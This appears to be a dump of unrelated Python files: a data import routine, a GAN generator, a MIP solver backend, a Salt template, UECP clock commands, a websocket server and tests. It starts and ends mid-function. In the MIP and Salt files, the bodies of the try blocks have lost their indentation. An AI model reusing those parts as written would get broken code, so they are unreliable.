        new['anbieter_herkunft'] = decode_html(item_org.anbieter_herkunft)
        new['isbn'] = decode_html(item_org.isbn)
        new['preis'] = decode_html(item_org.preis)
        new['titel_lang'] = decode_html(item_org.titel_lang)
        new['beschreibung_lang'] = encode_html(decode_html(item_org.beschreibung_lang))
        if item_org.einsteller != '':
            email = encode_email(item_org.einsteller_email, item_org.einsteller)
            new['beschreibung_lang'] += '<p>%s: %s</p>\n' % (_(u'Einsteller/in: '), email)
        new['publikations_datum'] = item_org.publikationsdatum
        new['standards_kmk'] = encode_html(decode_html(item_org.kmk_standards))
        new['standards_weitere'] = encode_html(decode_html(item_org.weitere_kompetenzen))
        new['techn_voraus'] = encode_html(decode_html(item_org.techn_voraussetzungen))
        new['lernziel'] = encode_html(decode_html(item_org.lernziel))
        new['lernzeit'] = encode_html(decode_html(item_org.lernzeit))
        new['methodik'] = encode_html(decode_html(item_org.methodik))
        new['lehrplan'] = encode_html(decode_html(item_org.lehrplanbezug))
        new['rechte'] = encode_html(decode_html(item_org.rechte))
        edu_item = DmsEduItem.save_values(DmsEduItem(), item_container_new, new, True)
        # --- subjects
        faecher = item_org.fach_sachgebiet.replace(',', '|').replace(';', '|')
        faecher = string.splitfields(faecher, '|')
        for fach_sachgebiet in faecher:
            fach_sachgebiet = fach_sachgebiet.strip()
            if fach_sachgebiet != '':
                fach_id = get_edu_fach_id_by_name(fach_sachgebiet)
                if fach_id != -1:
                    edu_item.fach_sachgebiet.add(fach_id)
        # --- school forms, defaulting to ids 1..3 when nothing matches
        schularten = item_org.schulform.replace(',', '|').replace(';', '|')
        schularten = string.splitfields(schularten, '|')
        found = False
        for schulart in schularten:
            schulart = schulart.strip()
            if schulart != '':
                schulart_id = get_schulart_id_by_name(schulart)
                if schulart_id != -1:
                    edu_item.schulart.add(schulart_id)
                    found = True
        if not found:
            for schulart_id in [1, 2, 3]:
                edu_item.schulart.add(schulart_id)
        # --- school levels (no default)
        schulstufen = item_org.bildungsebene.replace(',', '|').replace(';', '|')
        schulstufen = string.splitfields(schulstufen, '|')
        for schulstufe in schulstufen:
            schulstufe = schulstufe.strip()
            if schulstufe != '':
                schulstufe_id = get_schulstufe_id_by_name(schulstufe)
                if schulstufe_id != -1:
                    edu_item.schulstufe.add(schulstufe_id)
        # --- languages, defaulting to German
        sprachen = item_org.sprache.replace(',', '|').replace(';', '|')
        sprachen = string.splitfields(sprachen, '|')
        found = False
        for sprache in sprachen:
            sprache = sprache.strip()
            if sprache != '':
                sprache_id = get_edu_sprache_id(sprache)
                if sprache_id != -1:
                    edu_item.sprache.add(sprache_id)
                    # BUGFIX: found was never set, so 'de' was always added
                    found = True
        if not found:
            sprache_id = get_edu_sprache_id(_(u'de'))
            edu_item.sprache.add(sprache_id)
        # --- target groups, defaulting to ids 3..5
        zielgruppen = item_org.zielgruppe.replace(',', '|').replace(';', '|')
        zielgruppen = string.splitfields(zielgruppen, '|')
        found = False
        for zielgruppe in zielgruppen:
            zielgruppe = zielgruppe.strip()
            if zielgruppe != '':
                # BUGFIX: previously looked up the leftover loop variable
                # 'sprache' instead of the current 'zielgruppe'.
                zielgruppe_id = get_zielgruppe_id_by_name(zielgruppe)
                if zielgruppe_id != -1:
                    edu_item.zielgruppe.add(zielgruppe_id)
                    found = True
        if not found:
            for zielgruppe_id in [3, 4, 5]:
                edu_item.zielgruppe.add(zielgruppe_id)
        save_schlagworte(edu_item, new)
        if item_org.verfallsdatum:
            item_container_new.visible_end = item_org.verfallsdatum
            item_container_new.save()
        item_container_new.last_modified = item_org.letzte_aenderung
        item_container_new.save()
        send_control_email(item_container_new)
    # Fields intentionally not imported:
    #   autor_email, id_local, quelle_pfad (internal only),
    #   systematikpfad (covered by the chosen destination folder),
    #   zertifizierung (needs manual review), zeitstempel.
    #transaction.commit()
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
# Custom
from src.normalisation import channel, instance
class ResidualBlock(nn.Module):
    """Reflection-padded residual block: x + norm(conv(act(norm(conv(x))))).

    input_dims: dimension of the input tensor (B,C,H,W); only the channel
    count is used. Channel count and spatial size are preserved.
    """

    def __init__(self, input_dims, kernel_size=3, stride=1,
                 channel_norm=True, activation='relu'):
        super(ResidualBlock, self).__init__()
        self.activation = getattr(F, activation)
        n_channels = input_dims[1]
        norm_kwargs = dict(momentum=0.1, affine=True, track_running_stats=False)

        # Normalization flavor is selected once and reused for both layers.
        if channel_norm is True:
            self.interlayer_norm = channel.ChannelNorm2D_wrap
        else:
            self.interlayer_norm = instance.InstanceNorm2D_wrap

        # "same" padding via reflection, applied manually before each conv.
        self.pad = nn.ReflectionPad2d((kernel_size - 1) // 2)
        self.conv1 = nn.Conv2d(n_channels, n_channels, kernel_size, stride=stride)
        self.conv2 = nn.Conv2d(n_channels, n_channels, kernel_size, stride=stride)
        self.norm1 = self.interlayer_norm(n_channels, **norm_kwargs)
        self.norm2 = self.interlayer_norm(n_channels, **norm_kwargs)

    def forward(self, x):
        out = self.activation(self.norm1(self.conv1(self.pad(x))))
        out = self.norm2(self.conv2(self.pad(out)))
        # Skip connection around the two conv layers.
        return torch.add(out, x)
class Generator(nn.Module):
    def __init__(self, input_dims, batch_size, C=16, activation='relu',
                 n_residual_blocks=8, channel_norm=True, sample_noise=False,
                 noise_dim=32):
        """
        Generator with convolutional architecture proposed in [1].
        Upscales quantized encoder output into feature map of size C x W x H.
        Expects input size (C,16,16)
        ========
        Arguments:
        input_dims:        Dimensions of quantized representation, (C,H,W)
        batch_size:        Number of instances per minibatch
        C:                 Encoder bottleneck depth, controls bits-per-pixel
                           C = 220 used in [1].
        activation:        One of 'relu' | 'elu' | 'leaky_relu'
        n_residual_blocks: Number of residual blocks after the head conv
        channel_norm:      ChannelNorm2D when True, else InstanceNorm2D
        sample_noise:      Concatenate noise_dim Gaussian-noise channels
                           to the head feature map at forward time
        [1] Mentzer et. al., "High-Fidelity Generative Image Compression",
            arXiv:2006.09965 (2020).
        """
        super(Generator, self).__init__()
        kernel_dim = 3
        # Channel widths per upsampling stage (head -> output).
        filters = [960, 480, 240, 120, 60]
        self.n_residual_blocks = n_residual_blocks
        self.sample_noise = sample_noise
        self.noise_dim = noise_dim

        # Layer / normalization options
        # output_padding=1 makes each ConvTranspose2d exactly double H and W.
        cnn_kwargs = dict(stride=2, padding=1, output_padding=1)
        norm_kwargs = dict(momentum=0.1, affine=True, track_running_stats=False)
        activation_d = dict(relu='ReLU', elu='ELU', leaky_relu='LeakyReLU')
        self.activation = getattr(nn, activation_d[activation])  # (leaky_relu, relu, elu)
        self.n_upsampling_layers = 4

        if channel_norm is True:
            self.interlayer_norm = channel.ChannelNorm2D_wrap
        else:
            self.interlayer_norm = instance.InstanceNorm2D_wrap

        self.pre_pad = nn.ReflectionPad2d(1)
        self.asymmetric_pad = nn.ReflectionPad2d((0,1,1,0))  # Slower than tensorflow?
        self.post_pad = nn.ReflectionPad2d(3)

        H0, W0 = input_dims[1:]
        # NOTE(review): heights/widths and H1..W4 are computed but unused below.
        heights = [2**i for i in range(5,9)]
        widths = heights
        H1, H2, H3, H4 = heights
        W1, W2, W3, W4 = widths

        # (16,16) -> (16,16), with implicit padding
        self.conv_block_init = nn.Sequential(
            self.interlayer_norm(C, **norm_kwargs),
            self.pre_pad,
            nn.Conv2d(C, filters[0], kernel_size=(3,3), stride=1),
            self.interlayer_norm(filters[0], **norm_kwargs),
        )

        if sample_noise is True:
            # Concat noise with latent representation: residual blocks and
            # upconv1 must accept the widened channel count.
            filters[0] += self.noise_dim

        for m in range(n_residual_blocks):
            resblock_m = ResidualBlock(input_dims=(batch_size, filters[0], H0, W0),
                                       channel_norm=channel_norm, activation=activation)
            self.add_module(f'resblock_{str(m)}', resblock_m)

        # Each upconv block doubles the spatial resolution:
        # (16,16) -> (32,32)
        self.upconv_block1 = nn.Sequential(
            nn.ConvTranspose2d(filters[0], filters[1], kernel_dim, **cnn_kwargs),
            self.interlayer_norm(filters[1], **norm_kwargs),
            self.activation(),
        )
        self.upconv_block2 = nn.Sequential(
            nn.ConvTranspose2d(filters[1], filters[2], kernel_dim, **cnn_kwargs),
            self.interlayer_norm(filters[2], **norm_kwargs),
            self.activation(),
        )
        self.upconv_block3 = nn.Sequential(
            nn.ConvTranspose2d(filters[2], filters[3], kernel_dim, **cnn_kwargs),
            self.interlayer_norm(filters[3], **norm_kwargs),
            self.activation(),
        )
        self.upconv_block4 = nn.Sequential(
            nn.ConvTranspose2d(filters[3], filters[4], kernel_dim, **cnn_kwargs),
            self.interlayer_norm(filters[4], **norm_kwargs),
            self.activation(),
        )
        # Final 7x7 conv projects down to 3 (RGB) channels.
        self.conv_block_out = nn.Sequential(
            self.post_pad,
            nn.Conv2d(filters[-1], 3, kernel_size=(7,7), stride=1),
        )

    def forward(self, x):
        """Map latents (B,C,16,16) to an image tensor (B,3,256,256)-scale output."""
        head = self.conv_block_init(x)
        if self.sample_noise is True:
            # Fresh Gaussian noise each call, matched to head's device/dtype.
            B, C, H, W = tuple(head.size())
            z = torch.randn((B, self.noise_dim, H, W)).to(head)
            head = torch.cat((head,z), dim=1)
        for m in range(self.n_residual_blocks):
            resblock_m = getattr(self, f'resblock_{str(m)}')
            if m == 0:
                x = resblock_m(head)
            else:
                x = resblock_m(x)
        # Long skip connection around the whole residual stack.
        x += head
        x = self.upconv_block1(x)
        x = self.upconv_block2(x)
        x = self.upconv_block3(x)
        x = self.upconv_block4(x)
        out = self.conv_block_out(x)
        return out
if __name__ == "__main__":
    # Smoke test: push a random latent batch through a small Generator.
    bottleneck_C = 8
    latents = torch.randn([3, bottleneck_C, 16, 16])
    dims = latents.size()
    G = Generator(dims[1:], dims[0], C=bottleneck_C, n_residual_blocks=3, sample_noise=True)
    reconstruction = G(latents)
    print(reconstruction.size())
__all__ = ['Role']
from dataclasses import dataclass
from multibot import constants
from multibot.models.database import db
from multibot.models.enums import Platform
from multibot.models.event_component import EventComponent
@dataclass(eq=False)
class Role(EventComponent):
    """A platform role/permission group persisted in the ``role`` collection."""
    # Database collection backing this model (class-level, shared).
    collection = db.role
    # Field names that together identify a unique stored document.
    _unique_keys = ('platform', 'id', 'name', 'is_admin')

    platform: Platform = None
    id: int = None
    name: str = None
    is_admin: bool = None
    # Raw platform-specific role object this component wraps.
    original_object: constants.ROLE = None
|
def min_dollars(heights):
    """Return the minimum money needed to visit all pylons in order.

    Starting at height 0 with 0 energy, moving from height x to height y
    changes energy by (x - y). Whenever energy would go negative, dollars
    are paid (1 per unit) to bring it back to zero.
    """
    energy = 0
    prev_height = 0
    dollars_spent = 0
    for height in heights:
        energy += prev_height - height
        if energy < 0:
            dollars_spent += -energy
            energy = 0
        prev_height = height
    return dollars_spent


if __name__ == "__main__":
    # First input line: pylon count (read for format, length comes from the list).
    n = int(input())
    h = list(map(int, input().split()))
    print(min_dollars(h))
|
from argparse import ArgumentParser
from webmnist.export import export
from webmnist.train import train

# CLI: train and/or export a model to the given output path.
parser = ArgumentParser()
parser.add_argument("-o", "--output", type=str, required=True)
parser.add_argument("-e", "--epochs", type=int, default=3)
parser.add_argument("--train", action="store_true")
parser.add_argument("--export", action="store_true")
args = parser.parse_args()

if args.train:
    train(args.output, epochs=args.epochs)
if args.export:
    export(args.output)
from copy import copy
from typing import cast, Optional, List, Union, Iterable
from pydfs_lineup_optimizer.solvers.base import Solver
from pydfs_lineup_optimizer.solvers.constants import SolverSign
from pydfs_lineup_optimizer.solvers.exceptions import SolverException, SolverInfeasibleSolutionException
try:
from mip import Model, maximize, xsum, Var
from mip.constants import MAXIMIZE, BINARY, INTEGER, OptimizationStatus
except ImportError:
raise ImportError('You should install mip library before using this backend')
class MIPVariable:
    """Lazy wrapper around a ``mip`` variable, optionally scaled.

    The underlying solver variable is created in :meth:`setup` and cached;
    multiplying by an int produces a new wrapper carrying that multiplier.
    """

    def __init__(
            self,
            name: str,
            min_value: Optional[int] = None,
            max_value: Optional[int] = None,
            multiplier: Optional[int] = None
    ):
        self.name = name
        self.min_value = min_value
        self.max_value = max_value
        self.multiplier = multiplier
        self.__cache = None  # resolved mip Var, filled lazily

    def setup(self, solver: Model):
        """Register this variable on *solver*: integer if bounded, else binary."""
        if any([self.min_value, self.max_value]):
            created = solver.add_var(name=self.name, lb=self.min_value, ub=self.max_value, var_type=INTEGER)
        else:
            created = solver.add_var(name=self.name, var_type=BINARY)
        self.__cache = created

    def get_var(self, solver: Model) -> Var:
        """Resolve the underlying mip Var, applying the multiplier if any."""
        cached = self.__cache
        if not cached:
            cached = solver.var_by_name(self.name)
            self.__cache = cached
        return self.multiplier * cached if self.multiplier else cached

    def __mul__(self, other: int) -> 'MIPVariable':
        # Returns a fresh wrapper; the cached Var is deliberately not shared.
        return MIPVariable(self.name, self.min_value, self.max_value, other)

    def __rmul__(self, other: int) -> 'MIPVariable':
        return self.__mul__(other)
class MIPConstraint:
    """Deferred linear constraint, materialized on a mip Model via setup()."""

    def __init__(
            self,
            variables: Iterable[MIPVariable],
            coefficients: Optional[Iterable[float]],
            sign: str,
            rhs: Union[float, MIPVariable],
            name: Optional[str] = None
    ):
        self.variables = variables
        self.coefficients = coefficients
        self.sign = sign
        self.rhs = rhs
        self.name = name

    def __str__(self):
        names = [var.name for var in self.variables]
        return f'{names} {self.sign} {self.rhs}'

    def setup(self, solver):
        """Add this constraint to *solver*; raises SolverException on a bad sign."""
        if self.coefficients:
            terms = [variable.get_var(solver) * coefficient
                     for variable, coefficient in zip(self.variables, self.coefficients)]
        else:
            terms = [variable.get_var(solver) for variable in self.variables]
        lhs = xsum(terms)
        rhs = self.rhs.get_var(solver) if isinstance(self.rhs, MIPVariable) else self.rhs
        if self.sign == SolverSign.EQ:
            expr = lhs == rhs
        elif self.sign == SolverSign.NOT_EQ:
            expr = lhs != rhs
        elif self.sign == SolverSign.GTE:
            expr = lhs >= rhs
        elif self.sign == SolverSign.LTE:
            expr = lhs <= rhs
        else:
            raise SolverException('Incorrect constraint sign')
        # Named constraints are added as (expr, name) tuples.
        solver += (expr, self.name) if self.name else expr
class MIPObjective:
    """Maximization objective: sum of coefficient * variable."""

    def __init__(self, variables: List[MIPVariable], coefficients: List[float]):
        self.variables = variables
        self.coefficients = coefficients

    def setup(self, solver: Model):
        """Install the maximize objective on *solver*."""
        terms = (variable.get_var(solver) * coefficient
                 for variable, coefficient in zip(self.variables, self.coefficients))
        solver.objective = maximize(xsum(terms))
class MIPSolver(Solver):
    """Solver backend built on the python-mip library.

    Variables/constraints/objective are collected eagerly and only written
    to the underlying Model when solve() runs.
    """

    def __init__(self):
        self.model = None  # type: Optional[Model]
        self._vars = {}           # name -> MIPVariable
        self._constraints = []    # MIPConstraint instances
        self._objective = None    # MIPObjective

    def setup_solver(self) -> None:
        """Create a fresh, silent maximization model."""
        self.model = Model(name='pydfs_lineup_optimizer', sense=MAXIMIZE)
        self.model.solver.set_verbose(0)

    def add_variable(self, name, min_value=None, max_value=None):
        """Register a uniquely-named variable and return its wrapper."""
        if name in self._vars:
            raise ValueError(name)
        variable = MIPVariable(name, min_value, max_value)
        self._vars[name] = variable
        return variable

    def set_objective(self, variables, coefficients):
        self._objective = MIPObjective(variables, coefficients)

    def add_constraint(self, variables, coefficients, sign, rhs, name=None):
        self._constraints.append(
            MIPConstraint(variables, coefficients, sign, rhs, name))

    def copy(self):
        """Clone this solver with a fresh Model; wrappers are shared shallowly."""
        clone = type(self)()
        clone.setup_solver()
        clone._vars = copy(self._vars)
        clone._constraints = copy(self._constraints)
        clone._objective = self._objective
        return clone

    def solve(self):
        """Materialize the problem, optimize, and return the selected variables.

        Raises SolverInfeasibleSolutionException when no (near-)optimal
        solution exists.
        """
        model = cast(Model, self.model)
        for variable in self._vars.values():
            variable.setup(model)
        for constraint in self._constraints:
            constraint.setup(model)
        cast(MIPObjective, self._objective).setup(model)
        if model.optimize() not in (OptimizationStatus.OPTIMAL, OptimizationStatus.FEASIBLE):
            raise SolverInfeasibleSolutionException([])
        selected = []
        for model_var in model.vars:  # type: ignore
            value = model_var.x
            # A variable is "chosen" when its value rounds to at least 1.
            if value is not None and round(value) >= 1.0:
                selected.append(self._vars[model_var.name])
        return selected
|
# -*- coding: utf-8 -*-
'''
{{module_name}} execution module
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
{{short_description}}
.. versionadded:: {{version}}
:configuration:
.. code-block:: yaml
<your example config>
'''
# Import Python libs
from __future__ import absolute_import
import logging
# Import salt libs
import salt.utils.compat
# Import third party libs
try:
# Import libs...
{% if depending_libraries %}
import {{depending_libraries}}
{% endif %}
HAS_LIBS = True
MISSING_PACKAGE_REASON = None
except ImportError as ie:
HAS_LIBS = False
MISSING_PACKAGE_REASON = ie.message
log = logging.getLogger(__name__)
__virtualname__ = '{{virtual_name}}'
def __virtual__():
    '''
    Only load this module if its dependencies are installed on this minion.
    '''
    # HAS_LIBS / MISSING_PACKAGE_REASON are set by the import guard at the
    # top of this template file.
    if HAS_LIBS:
        return __virtualname__
    return (False,
            'The {{module_name}} execution module failed to load:'
            'import error - {0}.'.format(MISSING_PACKAGE_REASON))
def __init__(opts):
    '''
    Module initializer, called by the salt loader with the minion opts.
    '''
    # Put logic here to instantiate underlying jobs/connections
    salt.utils.compat.pack_dunder(__name__)
def my_action(params):
    '''
    Example action stub -- replace the body with your module's real logic.
    '''
    return None
|
'''
niceprints
==========
This module provides functions which add visual flair to your text, to make
your print statements more interesting.
These functions only do the minimum amount of transformation for their effect.
You should do your uppercase/lowercase, text wrap, etc. before calling
these functions.
'''
import shutil
from voussoirkit import dotdict
from voussoirkit import stringtools
SINGLE_BOX = dotdict.DotDict(
upper_left='┌',
upper_right='┐',
top='─',
lower_left='└',
lower_right='┘',
side='│',
)
DOUBLE_BOX = dotdict.DotDict(
upper_left='╔',
upper_right='╗',
top='═',
lower_left='╚',
lower_right='╝',
side='║',
)
def equals_header(text):
    '''
    Sample text
    ===========
    '''
    underline = '=' * stringtools.unicode_width(text)
    return f'{text}\n{underline}'
def in_box(text, *, boxchars=SINGLE_BOX, title=''):
    '''
    ┌───────────┐
    │Sample text│
    └───────────┘

    ╔═══════════╗
    ║Sample text║
    ╚═══════════╝

    ┌Sample Title────────────────────────────────┐
    │There is breaking news about an urgent topic│
    │and you'll never guess what it is           │
    └────────────────────────────────────────────┘

    This function does not perform text wrapping. Wrap your text before
    putting it in the box.
    '''
    lines = text.splitlines()
    # Width per distinct line; duplicates share one entry, which is fine.
    line_widths = {line: stringtools.unicode_width(line) for line in lines}
    longest = max(line_widths.values()) if line_widths else 0
    title_width = stringtools.unicode_width(title)
    inner_width = max(longest, title_width)

    output = []
    # Top edge, with the title embedded at the left if given.
    output.append(boxchars.upper_left + title + boxchars.top * (inner_width - title_width) + boxchars.upper_right)
    for line in lines:
        padding = ' ' * (inner_width - line_widths[line])
        output.append(f'{boxchars.side}{line}{padding}{boxchars.side}')
    output.append(boxchars.lower_left + boxchars.top * inner_width + boxchars.lower_right)
    return '\n'.join(output)
def solid_hash_header(text):
    '''
    # Sample text ##############################################################
    '''
    terminal_width = shutil.get_terminal_size()[0]
    # One left hash, space, and space after text.
    fill = '#' * (terminal_width - (stringtools.unicode_width(text) + 3))
    return f'# {text} {fill}'
|
from sepal_ui import model
from traitlets import Any
class OrderModel(model.Model):
    """Traitlets model holding order-related state; every trait is tagged
    ``sync=True`` so sepal_ui keeps it synchronized with bound widgets."""

    order_index = Any(None).tag(sync=True)  # presumably the selected order's index — confirm
    orders = Any(None).tag(sync=True)  # presumably the collection of fetched orders — confirm
    session = Any(None).tag(sync=True)  # presumably an API session handle — confirm
    quads = Any(None).tag(sync=True)  # presumably the quads attached to the order — confirm
|
from nonebot.rule import to_me
from nonebot import on_message
from nonebot.adapters.cqhttp import Bot, MessageEvent
from .data_source import get_message_reply, ChatMessageReply
# Only react to messages addressed to the bot (mention / reply / private chat).
chat = on_message(rule=to_me(), priority=10)


@chat.handle()
async def chat_handle(bot: Bot, event: MessageEvent):
    # Non-empty message: ask the chat backend for a reply and send it.
    # chat.finish() sends the reply and stops further event processing.
    if str(event.message):
        reply = ChatMessageReply(event.get_plaintext())
        msg = await reply.reply()
        await chat.finish(msg)
    # Empty message: answer with a canned prompt
    # (Chinese: "Dear, what's wrong? Is something the matter?").
    await chat.finish("亲爱的怎么啦!有什么事吗?")
|
import struct
import typing
import zoneinfo
from datetime import datetime, timedelta, timezone
from uecp.commands import UECPCommand
from uecp.commands.base import (
UECPCommandDecodeElementCodeMismatchError,
UECPCommandDecodeNotEnoughData,
)
@UECPCommand.register_type
class RealTimeClockSetCommand(UECPCommand):
    """Set the encoder's real-time clock (UECP MEC 0x0D).

    Wire format (9 bytes): MEC, year % 100, month, day, hour, minute,
    second, centiseconds, encoded local-time offset in half-hours.
    """

    ELEMENT_CODE = 0x0D
    UTC = zoneinfo.ZoneInfo("UTC")

    def __init__(self, timestamp: typing.Optional[datetime] = None):
        # Default to "now" in UTC; the setter enforces tz-awareness.
        self._timestamp = datetime.now(self.UTC)
        if timestamp is not None:
            self.timestamp = timestamp

    @property
    def timestamp(self) -> datetime:
        """The timezone-aware timestamp carried by this command."""
        return self._timestamp

    @timestamp.setter
    def timestamp(self, value: typing.Optional[datetime]):
        if value is None:
            self._timestamp = datetime.now(self.UTC)
            return
        if value.tzinfo is None:
            raise ValueError("Missing timezone")
        self._timestamp = value

    def encode(self) -> list[int]:
        """Encode as a 9-byte payload: the time in UTC plus the original
        local-time offset."""
        ts = self._timestamp.astimezone(self.UTC)
        data = [
            self.ELEMENT_CODE,
            ts.year % 100,  # two-digit year; create_from() assumes the 2000s
            ts.month,
            ts.day,
            ts.hour,
            ts.minute,
            ts.second,
            # BUG FIX: round() could yield 100 for microsecond >= 995000,
            # which is not a valid centisecond and made decode raise when
            # rebuilding the datetime; clamp to 99.
            min(round(ts.microsecond / 10_000), 99),
            self._encode_localtime_offset(self._timestamp.utcoffset() or timedelta()),
        ]
        return data

    @classmethod
    def create_from(
        cls, data: typing.Union[bytes, list[int]]
    ) -> tuple["RealTimeClockSetCommand", int]:
        """Decode a command from *data*; returns (command, bytes consumed)."""
        data = list(data)
        if len(data) < 9:
            raise UECPCommandDecodeNotEnoughData(len(data), 9)
        # BUG FIX: unpack only the 9 bytes this command consumes. The
        # original tuple-unpacked the whole buffer, raising ValueError for
        # any trailing data even though it reports 9 bytes consumed (the
        # sibling commands below correctly slice their input).
        (
            mec,
            year,
            month,
            day,
            hour,
            minute,
            second,
            centisecond,
            encoded_localtime_offset,
        ) = data[:9]
        if mec != cls.ELEMENT_CODE:
            raise UECPCommandDecodeElementCodeMismatchError(mec, cls.ELEMENT_CODE)
        offset = cls._decode_localtime_offset(encoded_localtime_offset)
        timestamp = datetime(
            year=year + 2000,  # two-digit years interpreted as 20xx
            month=month,
            day=day,
            hour=hour,
            minute=minute,
            second=second,
            microsecond=centisecond * 10_000,
            tzinfo=cls.UTC,
        ).astimezone(timezone(offset))
        return cls(timestamp=timestamp), 9

    @staticmethod
    def _encode_localtime_offset(offset: timedelta):
        """Encode *offset* as a sign bit (bit 5) plus a 5-bit count of
        half-hours (bits 0-4)."""
        offset_seconds = offset.total_seconds()
        sign = offset_seconds < 0
        # BUG FIX: the sign bit was written to bit 6, but the decoder
        # range-checks [0x00, 0x3F] (bit 6 can never be set) and reads the
        # magnitude from bits 0-4 — so negative offsets produced values the
        # decoder rejected outright.  Use bit 5 to match
        # _decode_localtime_offset.
        localtime_offset = (sign << 5) | abs(round(offset_seconds / 1800))
        return localtime_offset

    @staticmethod
    def _decode_localtime_offset(encoded_localtime_offset: int) -> timedelta:
        """Inverse of :meth:`_encode_localtime_offset`."""
        if not (0x00 <= encoded_localtime_offset <= 0x3F):
            raise ValueError(f"{encoded_localtime_offset:x} not in [0x00, 0x3f]")
        # BUG FIX: test bit 5 (the bit the encoder sets); the original
        # tested bit 6, which the range check above makes impossible.
        sign = -1 if encoded_localtime_offset & (1 << 5) else 1
        offset_seconds = sign * (encoded_localtime_offset & 0b11111) * 1800
        return timedelta(seconds=offset_seconds)
@UECPCommand.register_type
class RealTimeClockCorrectionSetCommand(UECPCommand):
    """Set a real-time-clock correction in milliseconds (UECP MEC 0x09).

    The adjustment travels on the wire as a big-endian signed 16-bit
    integer, so it must fit within [-32768, 32767].
    """

    ELEMENT_CODE = 0x09
    _STRUCT = struct.Struct(">h")  # big-endian int16

    def __init__(self, adjustment_ms: int = 0):
        self._adjustment_ms = 0
        # Route through the setter so the range check always applies.
        self.adjustment_ms = adjustment_ms

    @property
    def adjustment_ms(self) -> int:
        """Clock adjustment in milliseconds."""
        return self._adjustment_ms

    @adjustment_ms.setter
    def adjustment_ms(self, value):
        if not (-32768 <= value <= 32767):
            # IMPROVEMENT: the original raised a bare ValueError() with no
            # message; include the offending value for easier debugging.
            raise ValueError(
                f"adjustment_ms must fit a signed 16-bit integer "
                f"[-32768, 32767], got {value!r}"
            )
        self._adjustment_ms = int(value)

    def encode(self) -> list[int]:
        """Encode as [MEC, high byte, low byte]."""
        return [self.ELEMENT_CODE] + list(self._STRUCT.pack(self._adjustment_ms))

    @classmethod
    def create_from(
        cls, data: typing.Union[bytes, list[int]]
    ) -> tuple["RealTimeClockCorrectionSetCommand", int]:
        """Decode a command from *data*; returns (command, bytes consumed)."""
        data = list(data)
        if len(data) < 3:
            raise UECPCommandDecodeNotEnoughData(len(data), 3)
        mec = data[0]
        if mec != cls.ELEMENT_CODE:
            raise UECPCommandDecodeElementCodeMismatchError(mec, cls.ELEMENT_CODE)
        adjustment_ms = cls._STRUCT.unpack(bytes(data[1:3]))[0]
        return cls(adjustment_ms=adjustment_ms), 3
@UECPCommand.register_type
class RealTimeClockEnabledSetCommand(UECPCommand):
    """Enable or disable the encoder's real-time clock (UECP MEC 0x19)."""

    ELEMENT_CODE = 0x19

    def __init__(self, enable: bool):
        self._enable = bool(enable)

    @property
    def enable(self):
        """Whether the real-time clock is enabled."""
        return self._enable

    @enable.setter
    def enable(self, value):
        self._enable = bool(value)

    def encode(self) -> list[int]:
        """Encode as [MEC, flag] where flag is 0 or 1."""
        return [self.ELEMENT_CODE, int(self._enable)]

    @classmethod
    def create_from(
        cls, data: typing.Union[bytes, list[int]]
    ) -> tuple["RealTimeClockEnabledSetCommand", int]:
        """Decode a command from *data*; returns (command, bytes consumed)."""
        data = list(data)
        if len(data) < 2:
            raise UECPCommandDecodeNotEnoughData(len(data), 2)
        element_code, raw_flag = data[:2]
        if element_code != cls.ELEMENT_CODE:
            raise UECPCommandDecodeElementCodeMismatchError(element_code, cls.ELEMENT_CODE)
        if raw_flag not in (0x00, 0x01):
            raise ValueError("Not allowed value decoded")
        return cls(enable=bool(raw_flag)), 2
|
#############################################
## MODULE VARIABLES
#############################################
print('Load wsServer')  # import-time breadcrumb for startup tracing
import sys, time, json, asyncio, traceback
import websockets, noteTool
# Handle to the entry-point module; its receivedPayload coroutine (if any)
# receives every decoded incoming message (see onConnect).
_parent = sys.modules["__main__"]
# NOTE(review): _options is never written or read in this module — confirm
# whether it is still needed.
_options = None
#######################################
async def deliverPayload(connection, payload):
    """Serialize *payload* with noteTool and send it over the websocket
    *connection*.

    Errors propagate to the caller; the old best-effort try/except was
    already commented out and the dead code has been removed.
    """
    await connection.send(noteTool.object2serial(payload))
#######################################
async def onConnect(connection, path):
    """Handle one websocket client: deserialize each incoming frame and
    forward it to the parent module's receivedPayload hook, if defined.

    A failure while handling one message is logged and does not close
    the connection.
    """
    print('*** Connected client on wsServer')
    async for data in connection:
        try:
            payload = noteTool.serial2object(data)
            if hasattr(_parent, 'receivedPayload'):
                await _parent.receivedPayload(connection, payload)
        except Exception:
            # BUG FIX: the original bare ``except:`` also swallowed
            # BaseExceptions such as asyncio.CancelledError, preventing
            # clean task cancellation. Catch only ordinary errors.
            print('Abort onConnect', sys.exc_info()[0])
            traceback.print_exc()
#######################################
def start(options):
    """Run the websocket server forever, restarting it after any failure.

    *options* must provide "address" and "port". Blocks the calling
    thread; never returns under normal operation.
    """
    print('Start wsServer')
    while True:
        try:
            print(f'*** Start wsServer on address: {options["address"]}, port: {options["port"]}')
            asyncio.set_event_loop(asyncio.new_event_loop())
            server = websockets.serve(onConnect, options["address"], options["port"])
            asyncio.get_event_loop().run_until_complete(server)
            print('*** Wait for client connections')
            asyncio.get_event_loop().run_forever()
        except Exception:
            # BUG FIX: the original bare ``except:`` also caught
            # KeyboardInterrupt/SystemExit, making the server impossible to
            # stop from the terminal.
            print('Abort start', sys.exc_info()[0])
            traceback.print_exc()
            # Avoid a tight crash/retry loop (e.g. when the port is busy).
            time.sleep(1)
#######################################
# MAIN
#######################################
# Run this module on main thread to unit test with following code
if __name__ == "__main__":
    # Standalone unit-test configuration; adjust address/port for your LAN.
    # Only "address" and "port" are read by start(); the remaining keys are
    # presumably consumed elsewhere — confirm before removing.
    options = {
        "endpoint": "ws://192.168.0.164:8080",
        "address": "192.168.0.164",
        "port": "8080",
        "path": "/",
        "queue": None,
        "onEvent": None
    }
    start(options)
# Module to test Icon
#-------------------------------------------------------------------------------
import pytest
import math
import numpy as np
import sympy
import probayes as pb
#-------------------------------------------------------------------------------
# (input, expected) pairs for test_log: log(e) must equal 1.
LOG_TESTS = [(math.exp(1.),1.)]
# (input, expected) pairs for test_inc: 3 + 1 must equal 4.
INC_TESTS = [(3,4)]
#-------------------------------------------------------------------------------
@pytest.mark.parametrize("inp,out", LOG_TESTS)
def test_log(inp, out):
    """sympy.log applied to an Icon must evaluate to the expected value."""
    icon = pb.Icon('x')
    expression = sympy.log(icon[:])
    evaluated = float(expression.subs({'x': inp}))
    is_close = np.isclose(evaluated, out)
    if isinstance(inp, np.ndarray):
        assert np.all(is_close), "Output values not as expected"
    else:
